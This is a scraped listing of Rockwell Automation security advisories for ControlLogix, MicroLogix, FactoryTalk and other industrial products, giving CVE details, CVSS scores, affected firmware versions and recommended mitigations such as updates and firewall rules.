1756-EN2F/C Update to 11.002 or later
ControlLogix 5580 controllers Update to V32.016 or later
GuardLogix 5580 controllers Update to V32.016 or later
CompactLogix 5380 controllers Update to V32.016 or later
Compact GuardLogix 5380 controllers Update to V32.016 or later
CompactLogix 5480 Update to V32.016 or later

Additional Mitigations

If updating firmware is not possible or unavailable, we recommend the following compensating controls to help minimize risk of the vulnerability.
  • Disable the web server, if possible. Please review the corresponding product user manual for instructions, which can be found in the Rockwell Automation Literature Library.
    • For 1732E, upgrade to the latest firmware to disable the web server.
  • Configure firewalls to disallow network communication through HTTP/Port 80.
Please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for more recommendations about maintaining the security posture of your environment.

References

High
PN1613 | PN1613 | Product Notice 1613: Logix Controllers Vulnerable to a Denial-of-Service Vulnerability
Published Date:
January 25, 2023
Last Updated:
January 25, 2023
CVE IDs:
CVE-2022-3157
Products:
1756-L71S, Standard Controllers, 1756-L72S, 1756-L73S, 1769 CompactLogix 5370
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.2
Revision History
Version 1.0 – December 15, 2022
Version 1.1 – January 17, 2022 – Updated risk mitigation section
Version 1.2 – January 25, 2023 – Updated risk mitigation section

Executive Summary

Rockwell Automation was made aware of a denial-of-service vulnerability that impacts several versions of our GuardLogix® and ControlLogix® controllers. Exploitation of this vulnerability could potentially lead to degradation in availability of the controller and/or a possible major non-recoverable fault (MNRF).

Customers using affected software versions are encouraged to evaluate the mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • CompactLogix™ 5370
  • Compact GuardLogix 5370
  • ControlLogix 5570
  • ControlLogix 5570 redundancy
  • GuardLogix 5570

Vulnerability Details

CVE-2022-3157 Controllers vulnerable to Denial-of-Service Condition
A vulnerability exists in the Rockwell Automation controllers that allows a malformed CIP™ request to cause a major non-recoverable fault (MNRF) and a denial-of-service condition (DOS).

CVSS Base Score:  8.6/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the products. Customers are also directed towards the risk mitigations and are encouraged, when possible, to combine these with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Products Affected

First Known Version Affected

Corrected In
CompactLogix 5370
ControlLogix 5570
GuardLogix 5570
 20.011
  • 33.013
  • 34.011 and later
Compact GuardLogix 5370 28.011
  • 33.013
  • 34.011 and later
ControlLogix 5570 Redundancy 20.054
  • 33.052
  • 34.051 and later

Reference

High
PN1614 | PN1614 | Studio 5000 Logix Emulate Vulnerable to a SMB Insecurely Configuration Vulnerability
Published Date:
December 22, 2022
Last Updated:
December 22, 2022
CVE IDs:
CVE-2022-3156
Products:
RSLogix Emulate 5000 / Studio 5000 Logix Emulate
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 22, 2022

Executive Summary

Rockwell Automation was made aware of a misconfiguration vulnerability that affects Studio 5000® Logix Emulate™. Exploitation of this vulnerability could potentially allow a malicious user to perform a remote code execution that could impact the confidentiality, integrity and availability of the software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

Studio 5000 Logix Emulate v.20 – 33

Vulnerability Details

CVE-2022-3156 Studio 5000 Logix Emulate SMB™ misconfiguration vulnerability
Users are granted elevated permissions on select product services. Due to this misconfiguration, a malicious user could potentially achieve remote code execution on the targeted software.

CVSS Base Score:  7.8/10 (High)
CVSS:3.1/ AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the products. Customers are also directed towards the risk mitigations provided and are encouraged, when possible, to combine these with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.
Vulnerabilities Product Suggested Actions
CVE-2022-3156 Studio 5000 Logix Emulate Customers should upgrade to version 34.00 or later to mitigate this issue.

References

High
PN1611 | MicroLogix 1100 and 1400 Product Web Server Application Vulnerable to Denial-Of-Service Condition Attack
Published Date:
December 13, 2022
Last Updated:
October 16, 2024
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from security researchers at Veermata Jijabai Technological Institute (VJTI). If exploited, this vulnerability could cause a denial-of-service condition in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 B/C v. 21.007 and below
  • MicroLogix™ 1400 A v. 7.000 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the webserver of the Micrologix-1400 B PLC contains a vulnerability that may lead to a denial-of-service condition. The security vulnerability could be exploited by an attacker with network access to the affected systems by sending TCP packets to webserver and closing it abruptly which would cause a denial-of-service condition for the web server application on the device.

(CVE 2022-3166) MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 7.5 /10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device)
  • Configure firewalls to disallow network communication through HTTP/Port 80
  • Upgrade to the MicroLogix 800 or MicroLogix 850 as this device does not have the web server component
If applying the mitigations noted above are not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.
 
Additional Resources

 

High
PN1612 | MicroLogix 1100 and 1400 Web Server Application Vulnerable to Cross Site Scripting Attack
Published Date:
December 13, 2022
Last Updated:
October 16, 2024
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores (v3.1):
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from a security researcher from Georgia Institute of Technology. If exploited, this vulnerability could allow an attacker to submit remote code in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability previously being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 B/C v. 21.007 and below
  • MicroLogix™ 1400 A v. 7.000 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the MicroLogix 1100 and 1400 controllers contain a vulnerability that may give an attacker the ability to accomplish remote code execution.  The vulnerability is an unauthenticated stored cross-site scripting vulnerability in the embedded webserver. The payload is transferred to the controller over SNMP and is rendered on the homepage of the embedded website.

(CVE 2022-46670) MicroLogix Controllers Vulnerable to Cross-Site Scripting Attack
CVSS Base Score: 8.2 /10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device).
  • Configure firewalls to disallow network communication through HTTP/Port 80
  • Upgrade to the Micro800 family as this device does not have the web server component.

If applying the mitigations noted above are not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.
 
Additional Resources

 

High
PN1609 | Logix Controllers Vulnerable to Denial-of-Service Attack
Published Date:
December 06, 2022
Last Updated:
October 16, 2024
CVE IDs:
CVE-2022-3752
Products:
1756-L83ES, Standard Controllers, 1756-L84ES, 1756-L81ES, 5069 CompactLogix, 1756-L82ES, 5069 Compact GuardLogix 5380
CVSS Scores (v3.1):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 6, 2022

Executive Summary

Rockwell Automation discovered a vulnerability within our Logix Controllers.  This vulnerability may allow an unauthorized user to cause a denial of service on a targeted device.  Customers using affected versions of this firmware are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • CompactLogix 5380 controllers
  • Compact GuardLogix® 5380 controllers
  • CompactLogix 5480 controllers
  • ControlLogix 5580 controllers
  • GuardLogix 5580 controllers

Vulnerability Details

CVE-2022-3752 Rockwell Automation Logix Controllers are Vulnerable to a Denial-of-Service Attack
An unauthorized user could use a specially crafted sequence of Ethernet/IP messages, combined with heavy traffic loading  to cause a denial-of-service condition resulting in a major non-recoverable fault. If the target device becomes unavailable, a user would have to clear the fault and redownload the user project file to bring the device back online and continue normal operation.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.
Products Affected First Known Version Affected Corrected In
CompactLogix 5380 Compact GuardLogix 5380 ControlLogix 5580 GuardLogix 5580 This vulnerability is present in firmware version 31.011 and later This issue has been mitigated in the following firmware versions:
  • 32.016 and later for versions 32
  • 33.015 and later for versions 33
  • 34.011 and later
Customers should upgrade to a version listed above to mitigate this vulnerability
CompactLogix 5480 This vulnerability is present in firmware version 32.011 and later

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines Article in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

ADDITIONAL LINKS

 

Medium
PN1608 | FactoryTalk Live Data Communication Module Vulnerable to Man-In-The-Middle Attack
Published Date:
December 01, 2022
Last Updated:
October 16, 2024
Products:
LiveData
CVSS Scores (v3.1):
5.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 1, 2022

Executive Summary

Rockwell Automation received a report from Guidepoint Security regarding a security vulnerability discovered within the FactoryTalk® Live Data Communication Module contained within the FactoryTalk Services Platform. Due to the use of a cleartext protocol in this module, malicious actors could conduct Address Resolution Protocol spoofing resulting in loss of integrity of the traffic. This could allow the attacker to view and modify unauthorized packets and potentially deceive the user into seeing false data on the human machine interface.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the issue, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk LiveData Communication Module (Contained within FactoryTalk Services Platform) - All versions

Vulnerability Details

FactoryTalk LiveData Communication Module vulnerable to man-in-the-middle attack
An unauthenticated attacker with network access can accomplish a man-in-the-middle attack utilizing the clear text protocol of the FactoryTalk LiveData Communication Module and modify traffic leading to a complete loss of integrity for the products affected by the vulnerability.  This condition could result in the operator at the human machine interface seeing manipulated data on the screen potentially breaking the integrity of the data that is seen.

CVSS v3.1 Base Score: 5.9/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to setup the secondary mitigation as described below that addresses the associated risk.  Customers are also directed towards general risk mitigation strategies provided in the QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Suggested Actions

Customers should setup IPsec to mitigate this issue as detailed in the QA46277 - Deploying FactoryTalk Software with IPsec Knowledgebase article.

General Security Guidelines

If customers are unable to implement IPsec, it is recommended that the below guidelines be adhered to as they provide strong mitigations against this type of attack.

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls to help ensure that unused or unnecessary protocols from unauthorized sources are blocked. For more information on TCP/UDP ports and protocols used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCPUDP Ports Used by Rockwell Automation Products.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • Consult the product documentation for specific features, (e.g. hardware keyswitch settings) which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances.

General security guidelines can be found in the QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

 

Critical
PN1576 | PN1576 | FactoryTalk® Activation Manager and Studio 5000 Logix Designer® contain Wibu Codemeter vulnerabilities.
Published Date:
November 17, 2022
Last Updated:
November 17, 2022
CVE IDs:
CVE-2021-20094, CVE-2021-20093, CVE-2021-41057
Products:
FactoryTalk Activation, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
7.5, 9.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – August 6, 2021
Revision History
Revision Number
2.0
Revision History
Version 2.0 - August 11, 2021 – Removed modified score
Revision History
Revision Number
3.0
Revision History
Version 3.0 – November 22, 2022

Executive Summary

Rockwell Automation is impacted by advisory ICSA-21-210-02 which contains two vulnerabilities targeting Wibu-Systems AG.  These vulnerabilities impact FactoryTalk® Activation Manager and Studio 5000 Logix Designer®. If successfully exploited, these vulnerabilities may allow the reading of data from the heap of the CodeMeter Runtime network server or result in a crash of the CodeMeter Runtime Server (i.e., CodeMeter.exe).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • FactoryTalk® Activation Manager v4.00 to v4.05.02
    • Includes Wibu-Systems AG CodeMeter v7.20a and earlier
  • Studio 5000 Logix Designer® v23.00.01 to v33.00.02

Vulnerability Details

CVE-2021-20093: CWE-126

FactoryTalk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems AG CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime Network Server to send back packets containing data from the heap.


Wibu-Systems AG score:

CVSS v3.1 Base Score: 9.1/10 Critical
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2021-20094: CWE-126

Factory Talk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime CmWAN server to send back packets containing data from the heap

Wibu-Systems AG score:

CVSS v3.1 Base Score: 7.5/10 HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

-------------------UPDATE: 22 Nov 2022----------------------

CVE-2021-41057: CWE-269

A local attacker could cause a Denial of Service by overwriting existing files on the affected system.

Wibu-Systems AG Score:
CVSS V3.1 Base Score: 7.1/10 HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Risk Mitigation & User Action

Customers using the affected FactoryTalk® Activation Manager and/or Studio 5000 Logix Designer® are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2021-20093 Update to Factory Talk Activation Manager 4.05.03 or later
For compatibility details about FactoryTalk Activation Manager, customers can consult the Product Compatibility and Download Center, Standard Views -> Software Latest Versions -> FactoryTalk Activation
CVE-2021-20094 Update to Factory Talk Activation Manager 4.05.03 or later
CVE-2021-41057 Update to Factory Talk Activation Manager 4.06.11 or later

Customers may update Wibu-Systems CodeMeter independently for FactoryTalk Activation Manager or Studio 5000 Logix Designer® by installing Wibu-Systems CodeMeter AG v7.30a.  Please refer to this support page to determine if Wibu-Systems CodeMeter AG v7.30a is compatible with the installed versions of Rockwell Automation software.

During installation, Rockwell Automation products bind CodeMeter Runtime to the Local Host adapter and the Network Server and CmWAN Server ports are disabled.  Therefore, if the default installation is not modified, Rockwell Automation software is not susceptible to these vulnerabilities over a network connection.  Default port 22350 is required if activation licenses are hosted from the machine.

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that Wibu CodeMeter Network Server and CmWAN Server (Default Port# 22350/TCP and 22351/TCP) are blocked from unauthorized sources.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to UDP Port# 2222 (CIP), TCP/UDP Port# 44818 (CIP), and TCP/UDP Port# 2221 (CIP Security) using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical
PN1508 | Treck Ripple20 TCP/IP Vulnerabilities Affect Multiple Rockwell Automation Products
Published Date:
November 01, 2022
Last Updated:
November 20, 2024
CVE IDs:
CVE-2020-11914, CVE-2020-11910, CVE-2020-11901, CVE-2020-11907, CVE-2020-11911, CVE-2020-11912, CVE-2020-25066, CVE-2020-11906
Products:
Flex I/O, 1408 PowerMonitor 1000, 1732E ArmorBlock I/O, 1426 PowerMonitor 5000
CVSS Scores (v3.1):
9.8, 9.1, 5.0, 3.7, 3.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

 

Revision Number

6.0

Revision History
Version 6.0 – August 13,  2024. Updated affected products list and user actions
Version 5.0 – November 1, 2022. Added patch information for additional products
Version 4.0 – May 17, 2022. Updated patch information for PowerFlex 755T and 6000T
Version 3.0 – February 9, 2021. Updated for ICSA-20-353-01.
Version 2.1 - January 13, 2021. Updated to reflect additional disclosure.
Version 2.0 - July 15, 2020. Updated table to reflect affected products and versions.
Version 1.0 - June 16, 2020. Initial Release.

Executive Summary

Treck, a real-time embedded Internet Protocol software vendor, reported several vulnerabilities (named "Ripple20") to Rockwell Automation that were discovered by security researchers at JSOF, a security vendor and research organization.  The embedded TCP/IP stack (versions earlier than 6.0.1.66) from Treck is used by many different technology vendors including Rockwell Automation. These vulnerabilities, if successfully exploited, may result in remote code execution, denial-of-service, or sensitive information disclosure.

Begin Update 3.0
On December 18, 2020, Treck reported four additional vulnerabilities that were discovered by security researchers at Intel. The following components of the embedded TCP/IP stack (versions 6.0.1.67 and prior) are affected: HTTP Server, IPv6, and DCHPv6. These vulnerabilities, if successfully exploited, may result in denial-of-service conditions or remote code execution.
End Update 3.0

Since this disclosure is part of a large multi-party coordination effort with the CERT/CC 
and ICS-CERT, not every vulnerability reported by Treck impacts Rockwell Automation. Please see the table under Affected Products for a full list of the affected Rockwell Automation products and the corresponding CVE ID.


Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

Affected Product Family Affected Versions CVE-2020-XXXXX
11896
 11897 11898 11899 11900 11901 11902 11903 11904 11905 11906 11907 11908 11909 11910 11911 11912 11913 11914
5094-AEN2SFPR/XT
5094-AEN2TR/XT
5094-AENSFPR/XT
5094-AENTR/XT

 1.011-4.011           X         X X     X X X    
5069-AENTR 3.011-4.011           X         X X     X X X    
1734-AENT/R 4.001- 6.012           X         X X     X X X    
1738-AENT/R 4.001- 6.012           X         X X     X X X    
1732E-16CFGM12R
 1732E-8X8M12DR
 1732E-IB16M12DR
1732E-IB16M12R
 1732E-OB16M12DR
 1732E-OB16M12R		 2.011-2.012           X         X X     X X X    
1791ES-ID2SSIR 1.001                                      
1799ER-IQ10XOQ10 2.011           X         X X     X X X    
1794-AENTR/XT 1.011-1.017           X         X X     X X X    
1732E-12X4M12QCDR
 1732E-16CFGM12QCR
 1732E-16CFGM12QCWR
 1732E-12X4M12P5QCDR
 1732E-16CFGM12P5QCR
 1.011-1.015           X         X X     X X X    
1732E-16CFGM12P5QCWR
 1.011-2.011           X         X X     X X X    
PowerMonitor 5000 4.19           X         X X     X X X   X
PowerMonitor 1000 4.10           X         X X     X X X   X
ArmorStart® ST+ Motor Controller 1.001           X         X X     X X      
Kinetix 5500 All*           X         X X     X X X    
Kinetix® 5700 All*           X         X X     X X X    
Kinetix 5100 1.001           X         X X     X X X    
PowerFlex 755T
PowerFlex 6000T		 All*           X         X X     X X      
CIP Safety Encoder All*           X         X X     X X      

Begin Update 3.0:
Affected Product Family Affected Versions CVE
1734-AENT/R 4.001- 6.012 CVE-2020-25066
1738-AENT/R 4.001- 6.012 CVE-2020-25066
1794-AENTR
1794-AENTR/XT		 1.011- 1.017 CVE-2020-25066
1732E-16CFGM12R
1732E-8X8M12DR
1732E-IB16M12DR
1732E-IB16M12R
1732E-OB16M12DR
1732E-OB16M12R		 2.011-2.012 CVE-2020-25066
1799ER-IQ10XOQ10 2.011 CVE-2020-25066
1732E-12X4M12QCDR
1732E-16CFGM12QCR
1732E-16CFGM12QCWR
1732E-12X4M12P5QCDR
1732E-16CFGM12P5QCR		 1.011-1.015 CVE-2020-25066
1732E-16CFGM12P5QCWR 1.011-2.011 CVE-2020-25066
PowerMonitor 5000 4.19 CVE-2020-25066
PowerMonitor 1000 4.10 CVE-2020-25066
End Update 3.0

 

Begin Update 6.0

 

 

Affected Product Family

 

 

 

 

Affected Versions

 

 

 

 

CVE

 

 

 

 

PowerFlex 527

 

 

 

 

all

 

 

 

 

CVE-2020-25066

 

 

End Update 6.0

 

Vulnerability Details

Begin Update 3.0:
CVE-2020-25066
A vulnerability in the Treck HTTP Server components allow an attacker to cause denial-of-service condition. This vulnerability may also result in arbitrary code execution.

CVSSv3.1 Score: 9.8/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
End Update 3.0


CVE-2020-11901
There is an improper input validation issue in the DNS resolver component when handling a sent packet. A remote, unauthenticated attacker may be able to inject arbitrary code on the target system using a maliciously crafted packet.

CVSSv3.1 Score: 9.1/CRITICAL
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2020-11906
There is an improper input validation issue in the Ethernet Link Layer component. An adjacent, unauthenticated attacker can send a malicious Ethernet packet that can trigger an integer underflow event leading to a crash or segment fault on the target device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11907
There is an improper handling of length parameter consistency issue in the TCP component. A remote, unauthenticated, attacker can send a malformed TCP packet that can trigger an integer underflow event leading to a crash or segmentation fault on the device.

CVSSv3.1 Score: 5.0/MEDIUM
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2020-11910
There is an improper input validation issue in the ICMPv4 component. A remote, unauthenticated attacker can send a malicious packet that may expose data present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11911
There is an improper access control issue in the ICPMv4 component. A remote, unauthenticated attacker can send a malicious packet that can lead to higher privileges in permissions assignments for some critical resources on the destination device.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2020-11912
There is an improper input validation issue in the IPv6 component. A remote, unauthenticated attacker can send a malicious packet that may expose some data that is present outside the bounds of allocated memory.

CVSSv3.1 Score: 3.7/LOW
CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2020-11914
There is an improper input validation issue in the ARP component. An unauthenticated, local attacker can send a malicious Layer-2 ARP packet that could lead to unintended exposure of some sensitive information on the target device.

CVSSv3.1 Score: 3.1/LOW
CVSS Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Update 2.1: Rockwell Automation is aware of the additional Treck TCP/IP Stack vulnerabilities disclosed (ICSA-20-353-01). Potential impact of these vulnerabilties is currently being investigated and this advisory will be updated when the investigation concludes.

Risk Mitigation & User Action

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available. Please subscribe to updates to this advisory and the Industrial Security Advisory Index (Knowledgebase ID 54102) to stay notified.
CVE Suggested Actions

CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912
CVE-2020-11914

 For successful exploitation, these vulnerabilities require malformed TCP/IP packets to reach the destination device and an active network connection. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies.

The CERT/CC has provided IDS rules to support additional mitigations for these vulnerabilities. These rules can be found on their Github page.

ICS-CERT has provided additional network mitigations in their public disclosure.

Begin Update 3.0:
CVE Suggested Actions
CVE-2020-25066 Follow suggested actions above and, when possible, implement firewall rules to filter out packets that contain a negative content length in the HTTP header.

ICS-CERT has provided additional network mitigations in their public disclosure.
End Update 3.0


Available Fixes:

Update 4.0 May 17, 2022
CVE Affected Product Suggested Actions
CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912		 5069-AENTR Apply firmware v4.012 or later (Download).
CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912		 5094-AEN2SFPR/XT
5094-AEN2TR/XT
5094-AENSFPR/XT
5094-AENTR/XT		 Apply firmware v5.012 or later (Download).
CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912
CVE-2020-11914		 Kinetix 5700 Apply v13 or later (Download).
CVE-2020-11901
CVE-2020-11906
CVE-2020-11907
CVE-2020-11910
CVE-2020-11911
CVE-2020-11912		 PowerFlex 755T
PowerFlex 6000T		 Apply 6.005 or later for PF755T.  Apply R8 or later for PF6000T. (Download)

Update 5.0 November 1, 2022
CVE Affected Product Family Suggested Actions
CVE-2020-25066 1734-AENT/R Apply firmware 7.011 or later.
1738-AENT/R Apply firmware 6.011 or later.
1794-AENTR
1794-AENTR/XT		 Apply firmware 2.011 or later.
1732E-16CFGM12R
1732E-8X8M12DR
1732E-IB16M12DR
1732E-IB16M12R
1732E-OB16M12DR
1732E-OB16M12R		 Apply firmware 3.011 or later.
1799ER-IQ10XOQ10 Apply firmware 3.011 or lter.
1732E-12X4M12QCDR
1732E-16CFGM12QCR
1732E-16CFGM12QCWR
1732E-12X4M12P5QCDR
1732E-16CFGM12P5QCR		 Apply firmware 3.011 or later.
